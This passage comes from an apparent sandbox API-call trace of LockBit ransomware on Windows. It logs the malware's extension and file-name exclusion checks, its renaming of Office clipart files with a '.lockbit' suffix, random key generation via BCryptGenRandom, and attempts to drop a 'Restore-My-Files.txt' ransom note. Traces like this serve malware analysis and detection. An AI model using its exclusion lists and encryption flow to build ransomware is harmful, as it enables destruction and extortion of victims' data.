(lpString1=".ndf", lpString2=".WMF") returned -1 [0138.449] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0138.449] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0138.450] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0138.450] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0138.450] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0138.450] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0138.450] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0138.450] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0138.450] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105238.WMF.lockbit") returned 72 [0138.450] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105238.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105238.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0138.451] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0138.451] malloc (_Size=0x40068) returned 0x3e70008 [0138.451] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=17172) returned 1 [0138.451] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.451] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.452] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0138.452] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.452] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.452] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0138.452] ReadFile (in: hFile=0x338, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0138.482] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105238.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105238.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0138.482] malloc (_Size=0xa6) returned 0x77d7a8 [0138.482] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0138.482] free (_Block=0x77d7a8) [0138.482] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105238.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0138.482] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0138.482] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0138.483] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65e1cad0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x2d0c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0105240.WMF", cAlternateFileName="")) returned 1 [0138.483] lstrcmpiW (lpString1=".", lpString2="J0105240.WMF") returned -1 [0138.483] lstrcmpiW (lpString1="..", lpString2="J0105240.WMF") returned -1 [0138.483] PathFindExtensionW (pszPath="J0105240.WMF") returned=".WMF" [0138.483] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0138.483] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0138.483] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0138.483] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0138.483] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0138.483] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0138.483] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0138.483] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0138.483] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0138.483] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0138.483] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0138.483] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0138.483] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0138.483] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0138.483] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0138.483] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0138.483] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0138.483] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0138.483] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0138.483] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0138.483] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0138.484] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0138.484] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0138.484] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0138.484] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.484] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0138.484] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0138.484] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0138.484] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0138.484] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0138.484] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0138.484] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0138.484] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0138.484] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0138.484] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0138.484] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0138.484] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0138.484] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0138.484] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0138.484] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0138.484] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0138.484] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0138.484] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.484] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0138.484] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0138.484] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0138.484] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0138.484] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0105240.WMF") returned 1 [0138.484] lstrcmpiW (lpString1="ntldr", lpString2="J0105240.WMF") returned 1 [0138.485] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0105240.WMF") returned 1 [0138.485] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0105240.WMF") returned -1 [0138.485] lstrcmpiW (lpString1="autorun.inf", lpString2="J0105240.WMF") returned -1 [0138.485] lstrcmpiW (lpString1="thumbs.db", lpString2="J0105240.WMF") returned 1 [0138.485] lstrcmpiW (lpString1="iconcache.db", lpString2="J0105240.WMF") returned -1 [0138.485] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0138.485] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105240.WMF") returned=".WMF" [0138.485] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0138.485] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0138.485] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0138.485] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0138.485] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0138.485] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0138.485] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0138.485] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0138.485] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0138.485] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0138.485] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0138.485] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0138.485] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0138.485] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0138.485] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0138.485] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0138.485] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0138.485] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0138.485] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0138.486] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0138.486] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0138.486] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0138.486] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0138.486] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0138.486] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0138.486] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0138.486] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0138.486] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0138.486] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105240.WMF.lockbit") returned 72 [0138.486] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105240.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105240.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0138.487] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0138.487] malloc (_Size=0x40068) returned 0x3df0008 [0138.487] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=11532) returned 1 [0138.487] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.488] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.488] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0138.488] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.488] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.488] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0138.488] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0138.490] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105240.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105240.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0138.490] malloc (_Size=0xa6) returned 0x77d7a8 [0138.490] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0138.491] free (_Block=0x77d7a8) [0138.491] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105240.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0138.491] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0138.491] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0138.492] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65e1cad0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x2bdc, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0105244.WMF", cAlternateFileName="")) returned 1 [0138.492] lstrcmpiW (lpString1=".", lpString2="J0105244.WMF") returned -1 [0138.492] lstrcmpiW (lpString1="..", lpString2="J0105244.WMF") returned -1 [0138.492] PathFindExtensionW (pszPath="J0105244.WMF") returned=".WMF" [0138.492] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0138.492] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0138.492] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0138.492] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0138.492] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0138.492] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0138.492] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0138.492] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0138.492] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0138.492] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0138.492] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0138.492] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0138.492] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0138.492] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0138.492] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0138.492] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0138.492] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0138.492] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0138.493] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0138.493] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0138.493] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0138.493] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0138.493] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0138.493] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0138.493] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.493] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0138.493] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0138.493] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0138.493] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0138.493] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0138.493] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0138.493] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0138.493] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0138.493] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0138.493] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0138.493] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0138.493] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0138.493] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0138.493] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0138.493] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0138.493] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0138.493] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0138.494] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.494] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0138.494] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0138.494] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0138.494] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0138.494] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0105244.WMF") returned 1 [0138.494] lstrcmpiW (lpString1="ntldr", lpString2="J0105244.WMF") returned 1 [0138.494] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0105244.WMF") returned 1 [0138.494] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0105244.WMF") returned -1 [0138.494] lstrcmpiW (lpString1="autorun.inf", lpString2="J0105244.WMF") returned -1 [0138.494] lstrcmpiW (lpString1="thumbs.db", lpString2="J0105244.WMF") returned 1 [0138.494] lstrcmpiW (lpString1="iconcache.db", lpString2="J0105244.WMF") returned -1 [0138.494] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0138.494] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105244.WMF") returned=".WMF" [0138.494] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0138.494] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0138.494] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0138.494] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0138.494] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0138.494] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0138.494] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0138.494] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0138.494] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0138.494] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0138.495] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0138.495] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0138.495] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0138.495] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0138.495] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0138.495] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0138.495] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0138.495] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0138.495] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0138.495] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0138.495] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0138.495] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0138.495] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0138.495] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0138.495] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0138.495] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0138.495] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0138.495] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0138.495] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105244.WMF.lockbit") returned 72 [0138.495] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105244.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105244.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0138.496] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0138.496] malloc (_Size=0x40068) returned 0x1ff1e60 [0138.496] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=11228) returned 1 [0138.496] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.497] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.497] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0138.497] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.498] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.498] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0138.498] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0138.502] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105244.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105244.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0138.502] malloc (_Size=0xa6) returned 0x77d7a8 [0138.502] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0138.503] free (_Block=0x77d7a8) [0138.503] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105244.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0138.503] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0138.503] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0138.503] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65e1cad0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x4b80, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0105246.WMF", cAlternateFileName="")) returned 1 [0138.503] lstrcmpiW (lpString1=".", lpString2="J0105246.WMF") returned -1 [0138.503] lstrcmpiW (lpString1="..", lpString2="J0105246.WMF") returned -1 [0138.503] PathFindExtensionW (pszPath="J0105246.WMF") returned=".WMF" [0138.503] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0138.504] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0138.504] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0138.504] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0138.504] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0138.504] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0138.504] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0138.504] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0138.504] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0138.504] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0138.504] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0138.504] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0138.504] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0138.504] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0138.504] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0138.504] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0138.504] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0138.504] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0138.504] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0138.504] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0138.504] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0138.504] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0138.504] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0138.505] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0138.505] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.505] lstrcmpiW 